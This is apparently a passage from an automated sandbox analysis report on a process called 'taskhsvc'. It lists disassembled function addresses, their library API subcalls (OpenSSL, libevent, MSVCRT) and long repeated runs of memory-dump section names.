    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001EEBE4, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 163
    APIs
      • Part of subcall function 00319B0B: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,003145AC), ref: 00319B69
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 0025B75C: __stack_chk_fail.LIBSSP-0 ref: 0025B790
      • Part of subcall function 0025B797: __stack_chk_fail.LIBSSP-0 ref: 0025B7F8
      • Part of subcall function 0025B7FF: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001EEC58), ref: 0025B86C
      • Part of subcall function 001C21C4: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001F73A0), ref: 001C21F7
      • Part of subcall function 001F2D31: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001E9B3E), ref: 001F2DCE
      • Part of subcall function 00230EF1: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,0025B4EC,?,?,?,?,?,?,?,?,?,001C424C), ref: 00230F24
      • Part of subcall function 001EE76C: strcmp.MSVCRT ref: 001EE905
      • Part of subcall function 001EE76C: abort.MSVCRT ref: 001EEA71
      • Part of subcall function 001EE76C: free.MSVCRT ref: 001EEB46
      • Part of subcall function 001EE76C: free.MSVCRT ref: 001EEB67
      • Part of subcall function 001EE76C: __stack_chk_fail.LIBSSP-0 ref: 001EEBD6
      • Part of subcall function 001E8CDE: __stack_chk_fail.LIBSSP-0 ref: 001E8DE1
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    • __stack_chk_fail.LIBSSP-0 ref: 001EEE36
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
      • Part of subcall function 001EA631: __stack_chk_fail.LIBSSP-0 ref: 001EA800
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BA5
      • Part of subcall function 00319B70: free.MSVCRT ref: 00319BC7
      • Part of subcall function 00319B70: __stack_chk_fail.LIBSSP-0 ref: 00319BE1
      • Part of subcall function 0025D0FB: __stack_chk_fail.LIBSSP-0 ref: 0025D187
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F0BA7, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123
    APIs
      • Part of subcall function 001F3AFF: __stack_chk_fail.LIBSSP-0 ref: 001F3C1F
      • Part of subcall function 001C22CB: abort.MSVCRT ref: 001C231B
      • Part of subcall function 001C22CB: event_pending.LIBEVENT-2-0-5 ref: 001C2351
      • Part of subcall function 001C22CB: __stack_chk_fail.LIBSSP-0 ref: 001C2371
    • __stack_chk_fail.LIBSSP-0 ref: 001F0D39
      • Part of subcall function 001F3521: abort.MSVCRT ref: 001F3577
      • Part of subcall function 001F3521: __stack_chk_fail.LIBSSP-0 ref: 001F36AB
      • Part of subcall function 001F1659: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C32C4), ref: 001F1688
      • Part of subcall function 001F37CE: abort.MSVCRT ref: 001F381E
      • Part of subcall function 001F37CE: __stack_chk_fail.LIBSSP-0 ref: 001F398D
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 001E3DED: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,001C1825), ref: 001E3E14
      • Part of subcall function 001C2C57: abort.MSVCRT ref: 001C2CA7
      • Part of subcall function 001C2C57: abort.MSVCRT ref: 001C2CEE
      • Part of subcall function 001C2C57: abort.MSVCRT ref: 001C2D70
      • Part of subcall function 001C2C57: __stack_chk_fail.LIBSSP-0 ref: 001C2D81
      • Part of subcall function 00325435: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,001F0905), ref: 00325455
      • Part of subcall function 001EF888: __stack_chk_fail.LIBSSP-0 ref: 001EFBD5
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855040395.001CA000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 00312D3B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 84
    APIs
      • Part of subcall function 003255C5: abort.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00312E2F), ref: 00325635
      • Part of subcall function 003255C5: _write.MSVCRT ref: 00325691
      • Part of subcall function 003255C5: __stack_chk_fail.LIBSSP-0 ref: 003256C2
      • Part of subcall function 00312B7A: __stack_chk_fail.LIBSSP-0 ref: 00312C03
      • Part of subcall function 00319D53: __stack_chk_fail.LIBSSP-0 ref: 00319DB3
    • __stack_chk_fail.LIBSSP-0 ref: 00312E49
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855329417.002DC000.00000040.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855013399.001C1000.00000020.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C76BD, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51
    APIs
      • Part of subcall function 0021F792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00206074), ref: 0021F7B2
      • Part of subcall function 00335FCA: ENGINE_load_builtin_engines.LIBEAY32 ref: 0033604B
      • Part of subcall function 00335FCA: ENGINE_register_all_complete.LIBEAY32 ref: 00336050
      • Part of subcall function 00335FCA: ENGINE_by_id.LIBEAY32 ref: 003360DF
      • Part of subcall function 00335FCA: ENGINE_set_default.LIBEAY32 ref: 0033617D
      • Part of subcall function 00335FCA: ENGINE_get_default_RSA.LIBEAY32 ref: 00336182
      • Part of subcall function 00335FCA: ENGINE_get_default_DH.LIBEAY32 ref: 00336197
      • Part of subcall function 00335FCA: ENGINE_get_default_ECDH.LIBEAY32 ref: 003361AC
      • Part of subcall function 00335FCA: ENGINE_get_default_ECDSA.LIBEAY32 ref: 003361C1
      • Part of subcall function 00335FCA: ENGINE_get_default_RAND.LIBEAY32 ref: 003361D6
      • Part of subcall function 00335FCA: ENGINE_get_default_RAND.LIBEAY32 ref: 003361EB
      • Part of subcall function 00335FCA: ENGINE_get_digest_engine.LIBEAY32 ref: 00336207
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 00336223
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 0033623F
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 0033625B
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 00336277
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 00336293
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 003362AF
      • Part of subcall function 00335FCA: ENGINE_get_cipher_engine.LIBEAY32 ref: 003362CB
      • Part of subcall function 00335FCA: __stack_chk_fail.LIBSSP-0 ref: 00336340
      • Part of subcall function 001DA978: __stack_chk_fail.LIBSSP-0 ref: 001DA9A0
      • Part of subcall function 003EC5D8: evutil_secure_rng_init.LIBEVENT-2-0-5 ref: 003EC5F5
      • Part of subcall function 003EC5D8: evutil_secure_rng_add_bytes.LIBEVENT-2-0-5 ref: 003EC62F
      • Part of subcall function 003EC5D8: evutil_secure_rng_get_bytes.LIBEVENT-2-0-5 ref: 003EC645
      • Part of subcall function 003EC5D8: __stack_chk_fail.LIBSSP-0 ref: 003EC65B
    • __stack_chk_fail.LIBSSP-0 ref: 001C77A4
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
      • Part of subcall function 002E38C7: __stack_chk_fail.LIBSSP-0 ref: 002E3900
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001C4C42, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25
    APIs
      • Part of subcall function 0033CC1C: RAND_poll.LIBEAY32 ref: 0033CC3A
      • Part of subcall function 0033CC1C: RAND_seed.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CC9E
      • Part of subcall function 0033CC1C: RAND_status.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CCCA
      • Part of subcall function 0033CC1C: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00335F8E), ref: 0033CCEB
    • __stack_chk_fail.LIBSSP-0 ref: 001C4C9B
      • Part of subcall function 00313842: __stack_chk_fail.LIBSSP-0 ref: 003138B7
    Strings
    Memory Dump Source
    • Source File: 00000013.00000002.1855013399.001C1000.00000020.sdmp, Offset: 001C0000, based on PE: true
    • Associated: 00000013.00000002.1854999429.001C0000.00000002.sdmp
    • Associated: 00000013.00000002.1855026342.001C9000.00000080.sdmp
    • Associated: 00000013.00000002.1855040395.001CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855065746.00225000.00000080.sdmp
    • Associated: 00000013.00000002.1855077166.00228000.00000040.sdmp
    • Associated: 00000013.00000002.1855089255.0022F000.00000080.sdmp
    • Associated: 00000013.00000002.1855104216.00230000.00000040.sdmp
    • Associated: 00000013.00000002.1855122824.00266000.00000080.sdmp
    • Associated: 00000013.00000002.1855138358.00267000.00000040.sdmp
    • Associated: 00000013.00000002.1855155118.0028B000.00000080.sdmp
    • Associated: 00000013.00000002.1855168257.0028C000.00000040.sdmp
    • Associated: 00000013.00000002.1855182515.0028D000.00000080.sdmp
    • Associated: 00000013.00000002.1855196147.00290000.00000040.sdmp
    • Associated: 00000013.00000002.1855225498.002D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855239885.002D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855254056.002D6000.00000080.sdmp
    • Associated: 00000013.00000002.1855272578.002D7000.00000040.sdmp
    • Associated: 00000013.00000002.1855294963.002D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855305598.002D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855317495.002DA000.00000080.sdmp
    • Associated: 00000013.00000002.1855329417.002DC000.00000040.sdmp
    • Associated: 00000013.00000002.1855351346.00348000.00000080.sdmp
    • Associated: 00000013.00000002.1855370256.003BA000.00000040.sdmp
    • Associated: 00000013.00000002.1855382391.003C3000.00000080.sdmp
    • Associated: 00000013.00000002.1855395021.003C4000.00000040.sdmp
    • Associated: 00000013.00000002.1855406286.003C6000.00000080.sdmp
    • Associated: 00000013.00000002.1855419002.003CA000.00000040.sdmp
    • Associated: 00000013.00000002.1855435469.003CC000.00000080.sdmp
    • Associated: 00000013.00000002.1855447997.003CE000.00000040.sdmp
    • Associated: 00000013.00000002.1855459106.003CF000.00000080.sdmp
    • Associated: 00000013.00000002.1855472726.003D0000.00000040.sdmp
    • Associated: 00000013.00000002.1855490051.003D3000.00000080.sdmp
    • Associated: 00000013.00000002.1855500813.003D4000.00000040.sdmp
    • Associated: 00000013.00000002.1855512417.003D8000.00000080.sdmp
    • Associated: 00000013.00000002.1855523270.003D9000.00000040.sdmp
    • Associated: 00000013.00000002.1855533374.003E0000.00000080.sdmp
    • Associated: 00000013.00000002.1855544480.003E1000.00000040.sdmp
    • Associated: 00000013.00000002.1855556363.003E4000.00000080.sdmp
    • Associated: 00000013.00000002.1855569787.003E5000.00000040.sdmp
    • Associated: 00000013.00000002.1855588250.003F6000.00000080.sdmp
    • Associated: 00000013.00000002.1855603610.003FE000.00000004.sdmp
    • Associated: 00000013.00000002.1855617063.003FF000.00000008.sdmp
    • Associated: 00000013.00000002.1855627940.00400000.00000004.sdmp
    • Associated: 00000013.00000002.1855639237.00402000.00000008.sdmp
    • Associated: 00000013.00000002.1855664504.00403000.00000004.sdmp
    • Associated: 00000013.00000002.1855675077.00405000.00000008.sdmp
    • Associated: 00000013.00000002.1855685431.0040B000.00000004.sdmp
    • Associated: 00000013.00000002.1855695362.0040C000.00000002.sdmp
    • Associated: 00000013.00000002.1855714597.0049D000.00000004.sdmp
    • Associated: 00000013.00000002.1855722372.004A3000.00000008.sdmp
    • Associated: 00000013.00000002.1855730014.004A8000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_19_2_1c0000_taskhsvc.jbxd
    Function 001F0D83, Relevance: 3.5, APIs: 2, Instructions: 462
    APIs
      • Part of subcall function 001E3E77: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,001F0DE8), ref: 001E3EB7
      • Part of subcall function 0021329C: abort.MSVCRT ref: 00213305
      • Part of subcall function 0021329C: __stack_chk_fail.LIBSSP-0 ref: 0021359C
      • Part of subcall function 001E471C: abort.MSVCRT ref: 001E4857
      • Part of subcall function 001E471C: __stack_chk_fail.LIBSSP-0 ref: 001E4887
      • Part of subcall function 00342356: abort.MSVCRT ref: 003423A6
      • Part of subcall function 00342356: SSL_pending.SSLEAY32 ref: 003423B4
      • Part of subcall function 00342356: __stack_chk_fail.LIBSSP-0 ref: 003423C4
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 00316586
      • Part of subcall function 00316562: strrchr.MSVCRT ref: 0031659C
      • Part of subcall function 00316562: __stack_chk_fail.LIBSSP-0 ref: 00316601
      • Part of subcall function 00319764: __stack_chk_fail.LIBSSP-0 ref: 00319857
      • Part of subcall function 003423F9: SSL_get_rbio.SSLEAY32 ref: 00342425
      • Part of subcall function 003423F9: BIO_number_read.LIBEAY32 ref: 0034242D
